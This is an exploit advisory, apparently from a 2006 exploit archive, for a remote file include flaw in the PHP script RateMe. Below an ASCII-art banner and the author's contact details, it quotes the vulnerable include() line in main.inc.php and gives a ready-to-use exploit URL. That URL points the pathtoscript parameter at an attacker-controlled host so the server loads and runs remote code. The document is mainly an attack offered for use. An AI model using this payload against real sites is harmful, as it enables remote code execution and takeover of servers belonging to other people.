RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
;;ii,,:: +
+ :::: ::
;;tt;;:: +
+ ;;:: ..,,::
;;ii,,:: +
+ ,,,, ii;;,, ii;;::
;;ii,,:: +
+ ii:: tt;;,, ..tt;;,,..
;;ii;;:: +
+ ii,,:: ttii,, ..ff;;;;::
;;ii;;:: +
+ tt;;::..,, tt;;,, ff;;;;ii
;;ii,,:: +
+ tt;;::;;:: tt;;,,.. jj;;,,..
;;tt,,:: +
+ tt;;;;,, tt;;,,.. tt;;;;
;;ii;;:: +
+ ..::,,;;,, tt;;,,.. tt;;,,
;;ii,,:: +
+ ..::,,ii;;;;.. tt;;,,.. iiii,,::
;;ii,,:: +
+ ::,,ttiijj;;,, tt;;;;.. ;;tt,,::
;;ii,,:: +
+ ,,;;ii tt;;,, ii;;,,.. ..jj;;::
;;ii;;:: +
+ ;;;;:: tt;;:: tt;;;;.. ff;;::
;;tt,,.. +
+ ii;;.. ,,ii;;:: ii;;,,.. jj;;,,
;;ii,,.. +
+ ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,,
;;ii;;.. +
+ tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,,
;;ii,,.. +
+ jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,,
;;ii,,.. +
+ ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,,
;;ii;;.. +
+ ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,,
;;ii,,.. +
+ iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,,
;;ii;; +
+ ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;::
;;ii,, +
+ jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;;
;;ii,, +
+ jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii::
;;ii:: +
+ iijjjjjjtt;; ;;ffffjjjjtt::
;;ii +
+ ;;..
ii;; +
+
.. +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#########################################################################################################
# Affected Script: RateMe
# Exploit name : RateMe <= all versions => ( main.inc.php ) Remote File
Include Vulnerability
# Author: Al7ejaz Hacker
# Website: http://www.planetluc.com/en/ not free version
# Discovered: 15/12/2006
# Conatact : saudi[at]hotmail.fr - & - al7ejaz.hackerz[at]gmail.com
#########################################################################################################
#########################################################################################################
#
# Description :
# File infected : main.inc.php , line 17
#
# echo "\n<!-- Start RateMe v$version output -->\n\n<link
href='".$pathtoscript."style.css' rel='stylesheet' type='text/css'>\n<div
class='votingtxt'>";
# include($pathtoscript.'db_connect.inc.php'); # <==
#
# Exploit : http://victime/path/main.inc.php?pathtoscript=http://Atacke
#
########################################################################################################